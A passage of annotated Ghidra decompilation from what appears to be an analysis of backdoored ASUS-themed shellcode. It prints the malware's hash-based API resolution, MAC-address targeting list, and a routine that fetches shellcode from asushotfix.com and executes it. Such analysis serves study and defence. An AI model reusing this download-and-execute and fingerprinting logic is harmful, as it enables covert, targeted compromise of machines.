SubProcessTag; void * PerflibData; void * EtwTraceData; void * WinSockData; ulong GdiBatchCount; union _union_7776 field_0xf74; ulong GuaranteedStackBytes; void * ReservedForPerf; void * ReservedForOle; ulong WaitingOnLoaderLock; void * SavedPriorityState; ulong ReservedForCodeCoverage; void * ThreadPoolData; void * * TlsExpansionSlots; ulong MuiGeneration; ulong IsImpersonating; void * NlsCache; void * pShimData; ushort HeapVirtualAffinity; ushort LowFragHeapDataSlot; void * CurrentTransactionHandle; struct _TEB_ACTIVE_FRAME * ActiveFrame; void * FlsData; void * PreferredLanguages; void * UserPrefLanguages; void * MergedPrefLanguages; ulong MuiImpersonation; union _union_7780 field_0xfc8; union _union_7781 field_0xfca; void * TxnScopeEnterCallback; void * TxnScopeExitCallback; void * TxnScopeContext; ulong LockCount; long WowTebOffset; void * ResourceRetValue; void * ReservedForWdf; ulonglong ReservedForCrt; struct _GUID EffectiveContainerId; }; struct _TEB_ACTIVE_FRAME_CONTEXT { ulong Flags; char * FrameName; }; struct _TEB_ACTIVE_FRAME { ulong Flags; struct _TEB_ACTIVE_FRAME * Previous; struct _TEB_ACTIVE_FRAME_CONTEXT * Context; }; // WARNING! conflicting data type names: /winapi_32/_EXCEPTION_REGISTRATION_RECORD - /ALL.h/_EXCEPTION_REGISTRATION_RECORD typedef WORD INTERNET_PORT; typedef union _union_140 _union_140, *P_union_140; typedef struct _EXCEPTION_RECORD _EXCEPTION_RECORD, *P_EXCEPTION_RECORD; typedef void * PVOID; typedef struct _CONTEXT _CONTEXT, *P_CONTEXT; typedef int (EXCEPTION_ROUTINE)(struct _EXCEPTION_RECORD *, PVOID, struct _CONTEXT *, PVOID); typedef EXCEPTION_ROUTINE * PEXCEPTION_ROUTINE; typedef struct _FLOATING_SAVE_AREA _FLOATING_SAVE_AREA, *P_FLOATING_SAVE_AREA; typedef struct _FLOATING_SAVE_AREA FLOATING_SAVE_AREA; struct _FLOATING_SAVE_AREA { DWORD ControlWord; DWORD StatusWord; DWORD TagWord; DWORD ErrorOffset; DWORD ErrorSelector; DWORD DataOffset; DWORD DataSelector; BYTE RegisterArea[80]; DWORD Cr0NpxState; }; struct _CONTEXT { DWORD ContextFlags; DWORD Dr0; DWORD Dr1; DWORD Dr2; DWORD Dr3; DWORD Dr6; DWORD Dr7; FLOATING_SAVE_AREA FloatSave; DWORD SegGs; DWORD SegFs; DWORD SegEs; DWORD SegDs; DWORD Edi; DWORD Esi; DWORD Ebx; DWORD Edx; DWORD Ecx; DWORD Eax; DWORD Ebp; DWORD Eip; DWORD SegCs; DWORD EFlags; DWORD Esp; DWORD SegSs; BYTE ExtendedRegisters[512]; }; union _union_140 { PEXCEPTION_ROUTINE Handler; PEXCEPTION_ROUTINE handler; }; struct _EXCEPTION_RECORD { DWORD ExceptionCode; DWORD ExceptionFlags; struct _EXCEPTION_RECORD * ExceptionRecord; PVOID ExceptionAddress; DWORD NumberParameters; ULONG_PTR ExceptionInformation[15]; }; typedef struct _IMAGE_EXPORT_DIRECTORY _IMAGE_EXPORT_DIRECTORY, *P_IMAGE_EXPORT_DIRECTORY; typedef struct _IMAGE_EXPORT_DIRECTORY IMAGE_EXPORT_DIRECTORY; struct _IMAGE_EXPORT_DIRECTORY { DWORD Characteristics; DWORD TimeDateStamp; WORD MajorVersion; WORD MinorVersion; DWORD Name; DWORD Base; DWORD NumberOfFunctions; DWORD NumberOfNames; DWORD AddressOfFunctions; DWORD AddressOfNames; DWORD AddressOfNameOrdinals; }; typedef union _union_137 _union_137, *P_union_137; union _union_137 { struct _EXCEPTION_REGISTRATION_RECORD * Next; struct _EXCEPTION_REGISTRATION_RECORD * prev; }; typedef CHAR * LPSTR; typedef struct URL_COMPONENTSA URL_COMPONENTSA, *PURL_COMPONENTSA; typedef struct URL_COMPONENTSA URL_COMPONENTS; typedef enum enum_2955 { INTERNET_SCHEME_DEFAULT=0, INTERNET_SCHEME_FILE=5, INTERNET_SCHEME_FIRST=12, INTERNET_SCHEME_FTP=1, INTERNET_SCHEME_GOPHER=2, INTERNET_SCHEME_HTTP=3, INTERNET_SCHEME_HTTPS=4, INTERNET_SCHEME_JAVASCRIPT=9, INTERNET_SCHEME_LAST=13, INTERNET_SCHEME_MAILTO=7, INTERNET_SCHEME_NEWS=6, INTERNET_SCHEME_PARTIAL=0, INTERNET_SCHEME_RES=11, INTERNET_SCHEME_SOCKS=8, INTERNET_SCHEME_UNKNOWN=1, INTERNET_SCHEME_VBSCRIPT=10 } enum_2955; typedef enum enum_2955 INTERNET_SCHEME; struct URL_COMPONENTSA { DWORD dwStructSize; LPSTR lpszScheme; DWORD dwSchemeLength; INTERNET_SCHEME nScheme; LPSTR lpszHostName; DWORD dwHostNameLength; INTERNET_PORT nPort; LPSTR lpszUserName; DWORD dwUserNameLength; LPSTR lpszPassword; DWORD dwPasswordLength; LPSTR lpszUrlPath; DWORD dwUrlPathLength; LPSTR lpszExtraInfo; DWORD dwExtraInfoLength; }; // WARNING! conflicting data type names: /winapi_32/_NT_TIB - /ALL.h/_NT_TIB typedef struct _NT_TIB NT_TIB; typedef DWORD ULONG; // WARNING! conflicting data type names: /winapi_32/_IMAGE_DATA_DIRECTORY - /ALL.h/_IMAGE_DATA_DIRECTORY typedef union _union_143 _union_143, *P_union_143; union _union_143 { PVOID FiberData; DWORD Version; }; typedef struct astruct astruct, *Pastruct; struct astruct { }; int getAddrByHash(IMAGE_DOS_HEADER *dllbase,uint hash) { IMAGE_EXPORT_DIRECTORY *export_dir; char *name; int running_hash; int i; char c; // from base address of dll `dllbase` get the export directory `export_dir` by traversing the PE // header though the optional header, etc. export_dir = (IMAGE_EXPORT_DIRECTORY *) ((int)&dllbase->e_magic + *(int *)((int)&dllbase->e_magic + (int)((int)&dllbase->e_lfanew->OptionalHeader + 0x60))); i = 0; // iterate over all names in the export directory if (0 < (int)export_dir->NumberOfNames) { do { // calculate a hash over the name, see `hash.c` for standalone implementation running_hash = 0; name = (char *)((int)&dllbase->e_magic + *(int *)((int)&dllbase->e_magic + i * 4 + export_dir->AddressOfNames)); c = *name; while (c != 0) { running_hash = running_hash * 0x21 + (int)c; name = name + 1; c = *name; } // if the hash matches the requested hash return the address of the function if (running_hash == hash) { return (int)&dllbase->e_magic + *(int *)((int)&dllbase->e_magic + (uint)*(ushort *) ((int)&dllbase->e_magic + i * 2 + export_dir->AddressOfNameOrdinals) * 4 + export_dir->AddressOfFunctions); } i += 1; // iterate over all the names in the export directory } while (i < (int)export_dir->NumberOfNames); } // in case there is no match return 0 return 0; } // FUNCTION // // resolves the import hashes and stores the resulting function pointers in the func_ptr_table[] // array undefined4 __cdecl import_resolution(func_ptr_table_t *func_ptr_table) { IMAGE_DOS_HEADER *dllbase; int addr; int j; int *ptr; uint hashes [20]; uint import_strings0 [7]; uint import_strings2 [6]; uint import_strings1 [4]; uint import_dlls [5]; uint import_string3 [5]; uint import_string4 [4]; uint num_imports [5]; IMAGE_DOS_HEADER *dllBase; int local_c; int i; num_imports[0] = 6; num_imports[1] = 6; import_strings1[1] = 0x6c0064; import_strings1[3] = 0x6c0064; import_strings2[1] = 0x6c0064; import_strings2[3] = 0x6c0064; // kernel32.dll string import_dlls[0] = (uint)import_strings0; // ntdll.dll import_dlls[1] = (uint)import_strings1; import_dlls[2] = (uint)import_strings2; // IPHLPAPI.dll import_dlls[3] = (uint)import_string3; // wininet.dll import_dlls[4] = (uint)import_string4; num_imports[2] = 3; num_imports[3] = 1; num_imports[4] = 4; // kernel32.dll import_strings0[0] = 0x65006b; import_strings0[1] = 0x6e0072; import_strings0[2] = 0x6c0065; import_strings0[3] = 0x320033; import_strings0[4] = 0x64002e; import_strings0[5] = 0x6c006c; import_strings0[6] = 0; // ntdll.dll import_strings1[0] = 0x74006e; import_strings1[2] = 0x2e006c; import_strings2[0] = 0x74006e; import_strings2[2] = 0x2e006c; import_strings2[4] = 0x6c; import_strings2[5] = 0; // IPHLPAPI import_string3[0] = 0x500049; import_string3[1] = 0x4c0048; import_string3[2] = 0x410050; import_string3[3] = 0x490050; import_string3[4] = 0; // wininet import_string4[0] = 0x690077; import_string4[1] = 0x69006e; import_string4[2] = 0x65006e; import_string4[3] = 0x74; // The hashes define the following functions (in that order): // // // LPVOID (* VirtualAlloc)(LPVOID, SIZE_T, DWORD, DWORD); // DWORD (* GetModuleFileNameW)(HMODULE, LPWSTR, DWORD); // WINBOOL (* WritePrivateProfileStringW)(LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR); // void (* GetSystemTimeAsFileTime)(LPFILETIME); // WINBOOL (* FileTimeToSystemTime)(FILETIME *, LPSYSTEMTIME); // WINBOOL (* VirtualFree)(LPVOID, SIZE_T, DWORD); // void * (* memcpy)(void *, void *, size_t); // int (* memcmp)(void *, void *, size_t); // void * (* memset)(void *, int, size_t); // int (* swprintf)(wchar_t *, size_t, wchar_t *, ...); // int (* sprintf)(char *, char *, ...); // char * (* strncat)(char *, char *, size_t); // int MD5Init; // int MD5Update; // int MD5Final; // int GetAdaptersAddresses; // HINTERNET (* InternetOpenA)(LPCSTR, DWORD, LPCSTR, LPCSTR, DWORD); // HINTERNET (* InternetOpenUrlA)(HINTERNET, LPCSTR, LPCSTR, DWORD, DWORD, DWORD_PTR); // WINBOOL (* InternetQueryDataAvailable)(HINTERNET, LPDWORD, DWORD, DWORD_PTR); // WINBOOL (* InternetReadFile)(HINTERNET, LPVOID, DWORD, LPDWORD); // hashes[0] = 0xdf894b12; hashes[1] = 0xb5114d1e; hashes[2] = 0xe06c4b85; hashes[3] = 0x1a6f40d7; hashes[4] = 0x79ea1906; hashes[5] = 0x7b260749; hashes[6] = 0x5a370cb; hashes[7] = 0x5a3705f; hashes[8] = 0x5a3b36b; hashes[9] = 0xf77105bd; hashes[10] = 0xa1f571a6; hashes[11] = 0xab4ca0df; hashes[12] = 0xc9cc0d1a; hashes[13] = 0x8922d4c9; hashes[14] = 0x314bc30; hashes[15] = 0x9acb1212; hashes[16] = 0x87b21b7c; hashes[17] = 0xd19124af; hashes[18] = 0xe8baa2fa; hashes[19] = 0x3d840fa5; local_c = 0; j = 0; do { dllbase = (IMAGE_DOS_HEADER *) (*func_ptr_table->LoadLibraryExW)(*(LPCWSTR *)((int)import_dlls + j),NULL,8); i = 0; if (0 < *(int *)((int)num_imports + j)) { ptr = (int *)(&func_ptr_table->VirtualAlloc + local_c); do { // here is a Ghidra bug(?) ... the decompiler lists register0x00000010 which can not be changed nor // adapted addr = getAddrByHash(dllbase,*(uint *)((int)register0x00000010 + (-0xfc - (int)&func_ptr_table->VirtualAlloc) + (int)ptr)); *ptr = addr; if (addr == 0) { return 0; } local_c += 1; ptr = ptr + 1; i += 1; } while (i < *(int *)((int)num_imports + j)); } j += 4; } while (j < 0x14); return 1; } // Query `GetAdapterAddresses` and depending on the `only_check_count` parameter only return the // number of adapters or also write the MD5 sums of the MAC addresses into `buffer`. int md5_mac(void *buffer,int only_check_count,func_ptr_table_t *func_ptrs) { ULONG ret; LPVOID alloced_buffer; int ret2; uint md5_ctx_ish [27]; int num_adapters; void *buffer_ptr; SIZE_T size; size = 0; ret = (*(code *)func_ptrs->GetAdaptersAddresses)(0,0,0,0,&size); if (ret == ERROR_BUFFER_OVERFLOW) { alloced_buffer = (*func_ptrs->VirtualAlloc)(NULL,size,MEM_COMMIT,PAGE_READWRITE); ret2 = (*(code *)func_ptrs->GetAdaptersAddresses)(0,0,0,alloced_buffer,&size); if ((ret2 == 0) && (num_adapters = 0, alloced_buffer != NULL)) { buffer_ptr = buffer; do { if (*(int *)((int)alloced_buffer + 0x34) != 0) { if (only_check_count == 0) { (*(code *)func_ptrs->MD5Init)(md5_ctx_ish); (*(code *)func_ptrs->MD5Update)(md5_ctx_ish,(int)alloced_buffer + 0x2c,6); (*(code *)func_ptrs->MD5Final)(md5_ctx_ish); (*func_ptrs->memcpy)(buffer_ptr,md5_ctx_ish + 0x16,0x10); } num_adapters += 1; buffer_ptr = (void *)((int)buffer_ptr + 0x14); } alloced_buffer = *(LPVOID *)((int)alloced_buffer + 8); } while (alloced_buffer != NULL); } } else { num_adapters = 0; } return num_adapters; } // WARNING: Could not reconcile some variable overlaps void C2(mac_md5_list_entry_t *md5s_of_thismachine,func_ptr_table_t *func_ptrs) { uint *__src; HINTERNET hInternet; HINTERNET hFile; uint *buffer; char *__dest; char beacon_str [64]; int url [9]; uint hex_str [3]; DWORD num_bytes_read; uint i; uint fmt_str [2]; undefined2 question_mark_str [2]; DWORD num_bytes_available; byte b; // SimpleStackStrings.py: ?https://asushotfix.com/logo2.jpg question_mark_str[0] = 0x3f; // SimpleStackStrings.py: https://asushotfix.com/logo2.jpg url[0] = 0x70747468; url[1] = 0x2f2f3a73; url[2] = 0x73757361; url[3] = 0x66746f68; url[4] = 0x632e7869; url[5] = 0x6c2f6d6f; url[6] = 0x326f676f; url[7] = 0x67706a2e; url[8] = 0; (*func_ptrs->memset)(beacon_str,0,0x40); // SimpleStackStrings.py: %02X fmt_str[0] = 0x58323025; fmt_str[1]._0_1_ = 0; i = 0; __dest = beacon_str; do { (*func_ptrs->memset)(hex_str,0,0xc); b = *(byte *)((int)md5s_of_thismachine->md5mac1 + i); if (b < 0x80) { (*func_ptrs->sprintf)((char *)hex_str,(char *)fmt_str,(int)(char)b); __src = hex_str; } else { (*func_ptrs->sprintf)((char *)hex_str,(char *)fmt_str); __src = (uint *)((int)hex_str + 6); } (*func_ptrs->memcpy)(__dest,__src,3); i += 1; __dest = __dest + 2; } while (i < 0x10); (*func_ptrs->strncat)((char *)url,(char *)question_mark_str,2); (*func_ptrs->strncat)((char *)url,beacon_str,0x40); hInternet = (*func_ptrs->InternetOpenA)(NULL,0,NULL,NULL,0); if (hInternet != NULL) { hFile = (*func_ptrs->InternetOpenUrlA)(hInternet,(LPCSTR)url,NULL,0,0x84800100,0); if (hFile != NULL) { // allocate a buffer to download shellcode into buffer = (uint *)(*func_ptrs->VirtualAlloc)(NULL,0x500000,MEM_COMMIT,PAGE_EXECUTE_READWRITE); while( true ) { num_bytes_available = 0; (*func_ptrs->InternetQueryDataAvailable)(hFile,&num_bytes_available,0,0); if (num_bytes_available == 0) break; // download shellcode (*func_ptrs->InternetReadFile) (hFile,(LPVOID)(*buffer + 8 + (int)buffer),num_bytes_available,&num_bytes_read); *buffer = *buffer; buffer[1] = buffer[1]; } // execute the downloaded shellcode (*(code *)(buffer + 2))(); if (buffer != NULL) { (*func_ptrs->VirtualFree)(buffer,0x500000,0x4000); } } } return; } // Compare the MD5s in `buffer` with the ones in `md5s_of_macs` if they match copy the MD5s to // `md5s_of_thismachine` then return none zero // in case they don't match return 0 int cmp_md5(func_ptr_table_t *func_ptrs,int *md5s_of_macs,void *buffer,uint cnt, mac_md5_list_entry_t *md5s_of_thismachine) { int iVar1; int iVar2; uint uVar3; int *piVar4; uint uVar5; void *__s2; int *piVar6; bool bVar7; int local_68; undefined local_64 [40]; int local_3c; undefined local_38 [20]; undefined local_24 [20]; int local_10; uint local_c; int *local_8; uVar3 = 0; local_8 = md5s_of_macs; iVar2 = 0; do { local_10 = *local_8; if (local_10 == 1) { iVar2 = 0xb; piVar4 = local_8; piVar6 = &local_68; while (iVar2 != 0) { iVar2 += -1; *piVar6 = *piVar4; piVar4 = piVar4 + 1; piVar6 = piVar6 + 1; } iVar2 = 0; local_c = 0; __s2 = buffer; if (cnt != 0) { do { iVar1 = (*func_ptrs->memcmp)(local_64,__s2,0x10); if (iVar1 == 0) { iVar2 = 1; break; } local_c += 1; __s2 = (void *)((int)__s2 + 0x14); } while (local_c < cnt); } if (iVar2 != 0) goto LAB_00000630; } bVar7 = local_10 == 2; local_10 = iVar2; if (bVar7) { local_10 = 0; local_c = 0; iVar2 = 0xb; piVar4 = local_8; piVar6 = &local_3c; while (iVar2 != 0) { iVar2 += -1; *piVar6 = *piVar4; piVar4 = piVar4 + 1; piVar6 = piVar6 + 1; } uVar5 = 0; __s2 = buffer; if (cnt != 0) { do { iVar2 = (*func_ptrs->memcmp)(local_38,__s2,0x10); if (iVar2 == 0) { local_c = 1; break; } uVar5 += 1; __s2 = (void *)((int)__s2 + 0x14); } while (uVar5 < cnt); } uVar5 = 0; __s2 = buffer; if (cnt != 0) { do { iVar2 = (*func_ptrs->memcmp)(local_24,__s2,0x10); if (iVar2 == 0) { if (local_c == 1) { local_10 = 1; } break; } uVar5 += 1; __s2 = (void *)((int)__s2 + 0x14); } while (uVar5 < cnt); } iVar2 = local_10; if (local_10 != 0) { LAB_00000630: (*func_ptrs->memcpy)(md5s_of_thismachine,md5s_of_macs + uVar3 * 0xb,0x2c); return iVar2; } } local_8 = local_8 + 0xb; uVar3 += 1; iVar2 = local_10; if (0x11 < uVar3) { return local_10; } } while( true ); } // WARNING: Variable defined which should be unmapped: lpSystemTimeAsFileTime void no_match(func_ptr_table_t *func_ptrs,int ebx,int edi) { DWORD len; undefined *puVar2; size_t __n; longlong lVar3; LPFILETIME lpSystemTimeAsFileTime; LPWSTR lpFilename; WCHAR module_filename [260]; WCHAR filename [260]; WCHAR string [20]; _SYSTEMTIME sytemtime; WCHAR fmt_str [14]; WCHAR keyname2 [8]; WCHAR idx_ini__string [8]; WCHAR keyname1 [8]; WCHAR keyname3 [8]; WCHAR appname [8]; uint _Stack28; WCHAR *puStack24; uint FStack16; uint len_1; int i; idx_ini__string[0] = L'i'; idx_ini__string[1] = L'd'; idx_ini__string[2] = L'x'; idx_ini__string[3] = L'.'; idx_ini__string[4] = L'i'; idx_ini__string[5] = L'n'; idx_ini__string[6] = L'i'; idx_ini__string[7] = L'\0'; i = 0; (*func_ptrs->memset)(module_filename,0,0x104); (*func_ptrs->memset)(filename,0,0x104); len = (*func_ptrs->GetModuleFileNameW)(NULL,module_filename,0x104); if ((len != 0) && (len_1 = len - 1, -1 < (int)len_1)) { __n = len + 1 + len_1; puStack24 = (WCHAR *)&stack0xfffffb2a; do { if ((*(short *)((int)puStack24 + __n) == 0x5c) && (i += 1, i == 3)) { (*func_ptrs->memcpy)(filename,module_filename,__n); (*func_ptrs->memcpy)((void *)((int)filename + __n),idx_ini__string,0xe); } len_1 -= 1; __n -= 2; } while (-1 < (int)len_1); } if (filename[0] != L'\0') { (*func_ptrs->memset)(&sytemtime,0,0x10); (*func_ptrs->GetSystemTimeAsFileTime)((LPFILETIME)&_Stack28); FUN_00005460(_Stack28 + 0x2ac18000,(int)puStack24 + (uint)(0xd53e7fff < _Stack28) + 0xfe624e21, 10000000,0,(LPFILETIME)&_Stack28,0,module_filename,0x104,edi,ebx); // here a function with just a `ret` opcode in it is called ... the question is why? just_a_return_but_why(); (*func_ptrs->FileTimeToSystemTime)((FILETIME *)&FStack16,(LPSYSTEMTIME)&sytemtime); (*func_ptrs->swprintf)((char *)string,(char *)fmt_str); // here the some stuff is written into `idx.ini` (*func_ptrs->WritePrivateProfileStringW)(appname,keyname1,string,filename); (*func_ptrs->WritePrivateProfileStringW)(appname,keyname2,string,filename); (*func_ptrs->WritePrivateProfileStringW)(appname,keyname3,string,filename); } return; } // WARNING: Could not reconcile some variable overlaps void payload(func_ptr_table_t *func_ptrs) { int mac_cnt; LPVOID buffer; uint mac_cnt2; int matched; SIZE_T dwSize; mac_md5_list_entry_t md5s_of_thismachine; mac_md5_list_entry_t md5s_of_macs [18]; // fill the structure with MD5s of target MACs md5s_of_macs[0].md5mac1[0] = 0xc706b000; md5s_of_macs[0].md5mac1[1] = 0xe6acb6da; md5s_of_macs[0].md5mac1[2] = 0x99375cc2; md5s_of_macs[0].md5mac1[3] = 0x146e2beb; md5s_of_macs[0].count = 2; md5s_of_macs[0].padding1 = 0; md5s_of_macs[0].md5mac2[0] = 0xa3ba7759; md5s_of_macs[0].md5mac2[1] = 0xa10ccef8; md5s_of_macs[0].md5mac2[2] = 0xc96a6dc9; md5s_of_macs[0].md5mac2[3] = 0x919a0ca4; md5s_of_macs[0].padding2 = 0; md5s_of_macs[1].count = 1; md5s_of_macs[1].md5mac1[0] = 0xc706b000; md5s_of_macs[1].md5mac1[1] = 0xe6acb6da; md5s_of_macs[1].md5mac1[2] = 0x99375cc2; md5s_of_macs[1].md5mac1[3] = 0x146e2beb; md5s_of_macs[1].padding1 = 0; md5s_of_macs[1].md5mac2[0]._0_1_ = 0; md5s_of_macs[1].md5mac2._1_4_ = 0; md5s_of_macs[1].md5mac2._5_4_ = 0; md5s_of_macs[1].md5mac2._9_4_ = 0; md5s_of_macs[1]._37_4_ = 0; md5s_of_macs[1].padding2._1_2_ = 0; md5s_of_macs[1].padding2[3] = 0; md5s_of_macs[2].count = 1; md5s_of_macs[2].md5mac1[0] = 0xeb8e9d40; md5s_of_macs[2].md5mac1[1] = 0xe54685ce; md5s_of_macs[2].md5mac1[2] = 0x40d70a6a; md5s_of_macs[2].md5mac1[3] = 0xbdad7a66; md5s_of_macs[2].padding1 = 0; md5s_of_macs[2].md5mac2[0]._0_1_ = 0; md5s_of_macs[2].md5mac2._1_4_ = 0; md5s_of_macs[2].md5mac2._5_4_ = 0; md5s_of_macs[2].md5mac2._9_4_ = 0; md5s_of_macs[2]._37_4_ = 0; md5s_of_macs[2].padding2._1_2_ = 0; md5s_of_macs[2].padding2[3] = 0; md5s_of_macs[3].count = 1; md5s_of_macs[3].md5mac1[0] = 0xd32da47d; md5s_of_macs[3].md5mac1[1] = 0xe1d47445; md5s_of_macs[3].md5mac1[2] = 0x700eeaa7; md5s_of_macs[3].md5mac1[3] = 0xa6c97b8e; md5s_of_macs[3].padding1 = 0; md5s_of_macs[3].md5mac2[0]._0_1_ = 0; md5s_of_macs[3].md5mac2._1_4_ = 0; md5s_of_macs[3].md5mac2._5_4_ = 0; md5s_of_macs[3].md5mac2._9_4_ = 0; md5s_of_macs[3]._37_4_ = 0; md5s_of_macs[3].padding2._1_2_ = 0; md5s_of_macs[3].padding2[3] = 0; md5s_of_macs[4].count = 2; md5s_of_macs[4].md5mac1[0] = 0x252ae6ad; md5s_of_macs[4].md5mac1[1] = 0x8411df7a; md5s_of_macs[4].md5mac1[2] = 0x91b2c518; md5s_of_macs[4].md5mac1[3] = 0x3e546732; md5s_of_macs[4].padding1 = 0; md5s_of_macs[4].md5mac2[0] = 0xd6ae6842; md5s_of_macs[4].md5mac2[1] = 0xf2ffa54a; md5s_of_macs[4].md5mac2[2]._0_1_ = 2; md5s_of_macs[4].md5mac2._9_4_ = 0x7947240d; md5s_of_macs[4].md5mac2[3]._1_2_ = 0x7d0d; md5s_of_macs[4].md5mac2[3]._3_1_ = 0x32; md5s_of_macs[4].padding2 = 0; md5s_of_macs[5].count = 1; md5s_of_macs[5].md5mac1[0] = 0x3fc5147b; md5s_of_macs[5].md5mac1[1] = 0xc14c60d3; md5s_of_macs[5].md5mac1[2] = 0xf45acaeb; md5s_of_macs[5].md5mac1[3] = 0xd5fe5a41; md5s_of_macs[5].padding1 = 0; md5s_of_macs[5].md5mac2[0]._0_1_ = 0; md5s_of_macs[5].md5mac2._1_4_ = 0; md5s_of_macs[5].md5mac2._5_4_ = 0; md5s_of_macs[5].md5mac2._9_4_ = 0; md5s_of_macs[5]._37_4_ = 0; md5s_of_macs[5].padding2._1_2_ = 0; md5s_of_macs[5].padding2[3] = 0; md5s_of_macs[6].count = 1; md5s_of_macs[6].md5mac1[0] = 0x2ea68e3a; md5s_of_macs[6].md5mac1[1] = 0xbeecb432; md5s_of_macs[6].md5mac1[2] = 0xa50df33; md5s_of_macs[6].md5mac1[3] = 0x73c8eb28; md5s_of_macs[6].padding1 = 0; md5s_of_macs[6].md5mac2[0]._0_1_ = 0; md5s_of_macs[6].md5mac2._1_4_ = 0; md5s_of_macs[6].md5mac2._5_4_ = 0; md5s_of_macs[6].md5mac2._9_4_ = 0; md5s_of_macs[6]._37_4_ = 0; md5s_of_macs[6].padding2._1_2_ = 0; md5s_of_macs[6].padding2[3] = 0; md5s_of_macs[7].count = 1; md5s_of_macs[7].md5mac1[0] = 0x6c9516cc; md5s_of_macs[7].md5mac1[1] = 0x2bcd0695; md5s_of_macs[7].md5mac1[2] = 0xd7a789b3; md5s_of_macs[7].md5mac1[3] = 0xbd3324da; md5s_of_macs[7].padding1 = 0; md5s_of_macs[7].md5mac2[0]._0_1_ = 0; md5s_of_macs[7].md5mac2._1_4_ = 0; md5s_of_macs[7].md5mac2._5_4_ = 0; md5s_of_macs[7].md5mac2._9_4_ = 0; md5s_of_macs[7]._37_4_ = 0; md5s_of_macs[7].padding2._1_2_ = 0; md5s_of_macs[7].padding2[3] = 0; md5s_of_macs[8].count = 2; md5s_of_macs[8].md5mac1[0] = 0x64cc4cfe; md5s_of_macs[8].md5mac1[1] = 0xa6539215; md5s_of_macs[8].md5mac1[2]._0_1_ = 1; md5s_of_macs[8].md5mac1._9_4_ = 0x71f10493; md5s_of_macs[8].md5mac1[3]._2_2_ = 0x6d88; md5s_of_macs[8].padding1 = 0; md5s_of_macs[8].md5mac2[0] = 0x7c341f2; md5s_of_macs[8].md5mac2[1] = 0x7477573a; md5s_of_macs[8].md5mac2[2] = 0x7214342c; md5s_of_macs[8].md5mac2[3] = 0xec3ed4e2; md5s_of_macs[8].padding2 = 0; md5s_of_macs[9].count = 1; md5s_of_macs[9].md5mac1[0] = 0x4a56c24e; md5s_of_macs[9].md5mac1[1] = 0xc52d98ce; md5s_of_macs[9].md5mac1[2] = 0xbf39108c; md5s_of_macs[9].md5mac1[3] = 0x3ca86e6d; md5s_of_macs[9].padding1 = 0; md5s_of_macs[9].md5mac2[0]._0_1_ = 0; md5s_of_macs[9].md5mac2._1_4_ = 0; md5s_of_macs[9].md5mac2._5_4_ = 0; md5s_of_macs[9].md5mac2._9_4_ = 0; md5s_of_macs[9]._37_4_ = 0; md5s_of_macs[9].padding2._1_2_ = 0; md5s_of_macs[9].padding2[3] = 0; md5s_of_macs[10].count = 2; md5s_of_macs[10].md5mac1[0] = 0x9eef0cab; md5s_of_macs[10].md5mac1[1] = 0x9e125759; md5s_of_macs[10].md5mac1[2] = 0x78a1fb23; md5s_of_macs[10].md5mac1[3] = 0xba20f12; md5s_of_macs[10].padding1 = 0; md5s_of_macs[10].md5mac2[0]._0_2_ = 0x58f7; md5s_of_macs[10].md5mac2._3_4_ = 0x7740734e; md5s_of_macs[10].md5mac2._7_4_ = 0xe93205c7; md5s_of_macs[10].md5mac2[3]._0_2_ = 0xc551; md5s_of_macs[10].md5mac2[3]._2_1_ = 0xdf; md5s_of_macs[10].padding2 = 0; md5s_of_macs[11].count = 1; md5s_of_macs[11].md5mac1[0] = 0x61605af3; md5s_of_macs[11].md5mac1[1] = 0xde36b37a; md5s_of_macs[11].md5mac1[2] = 0x99c7aa4d; md5s_of_macs[11].md5mac1[3] = 0xb6076d67; md5s_of_macs[11].padding1 = 0; md5s_of_macs[11].md5mac2[0]._0_1_ = 0; md5s_of_macs[11].md5mac2._1_4_ = 0; md5s_of_macs[11].md5mac2._5_4_ = 0; md5s_of_macs[11].md5mac2._9_4_ = 0; md5s_of_macs[11]._37_4_ = 0; md5s_of_macs[11].padding2._1_2_ = 0; md5s_of_macs[11].padding2[3] = 0; md5s_of_macs[12].count = 1; md5s_of_macs[12].md5mac1[0] = 0xd8ea626a; md5s_of_macs[12].md5mac1[1]._0_1_ = 1; md5s_of_macs[12].md5mac1._5_4_ = 0x9e5c2a80; md5s_of_macs[12].md5mac1._9_4_ = 0xc1d028c8; md5s_of_macs[12].md5mac1[3]._1_2_ = 0xbbed; md5s_of_macs[12].md5mac1[3]._3_1_ = 0x5b; md5s_of_macs[12].padding1 = 0; md5s_of_macs[12].md5mac2[0]._0_1_ = 0; md5s_of_macs[12].md5mac2._1_4_ = 0; md5s_of_macs[12].md5mac2._5_4_ = 0; md5s_of_macs[12].md5mac2._9_4_ = 0; md5s_of_macs[12]._37_4_ = 0; md5s_of_macs[12].padding2._1_2_ = 0; md5s_of_macs[12].padding2[3] = 0; md5s_of_macs[13].count = 1; md5s_of_macs[13].md5mac1[0] = 0x527b0c60; md5s_of_macs[13].md5mac1[1] = 0x3208f8e7; md5s_of_macs[13].md5mac1[2] = 0x4fe8cee3; md5s_of_macs[13].md5mac1[3] = 0x9d8bc8ce; md5s_of_macs[13].padding1 = 0; md5s_of_macs[13].md5mac2[0]._0_1_ = 0; md5s_of_macs[13].md5mac2._1_4_ = 0; md5s_of_macs[13].md5mac2._5_4_ = 0; md5s_of_macs[13].md5mac2._9_4_ = 0; md5s_of_macs[13]._37_4_ = 0; md5s_of_macs[13].padding2._1_2_ = 0; md5s_of_macs[13].padding2[3] = 0; md5s_of_macs[14].count = 2; md5s_of_macs[14].md5mac1[0] = 0xd7b2756e; md5s_of_macs[14].md5mac1[1] = 0x64980e47; md5s_of_macs[14].md5mac1[2] = 0xcb489ed1; md5s_of_macs[14].md5mac1[3] = 0x64af0c36; md5s_of_macs[14].padding1 = 0; md5s_of_macs[14].md5mac2[0] = 0xcd9b55fb; md5s_of_macs[14].md5mac2[1] = 0xfce03e10; md5s_of_macs[14].md5mac2[2] = 0x6141cfb0; md5s_of_macs[14].md5mac2[3] = 0x19fbfab0; md5s_of_macs[14].padding2 = 0; md5s_of_macs[15].count = 1; md5s_of_macs[15].md5mac1[0] = 0x1ed60a69; md5s_of_macs[15].md5mac1[1] = 0x99a85c7; md5s_of_macs[15].md5mac1[2] = 0x666b2164; md5s_of_macs[15].md5mac1[3] = 0x1a3bd3b5; md5s_of_macs[15].padding1 = 0; md5s_of_macs[15].md5mac2[0]._0_1_ = 0; md5s_of_macs[15].md5mac2._1_4_ = 0; md5s_of_macs[15].md5mac2._5_4_ = 0; md5s_of_macs[15].md5mac2._9_4_ = 0; md5s_of_macs[15]._37_4_ = 0; md5s_of_macs[15].padding2._1_2_ = 0; 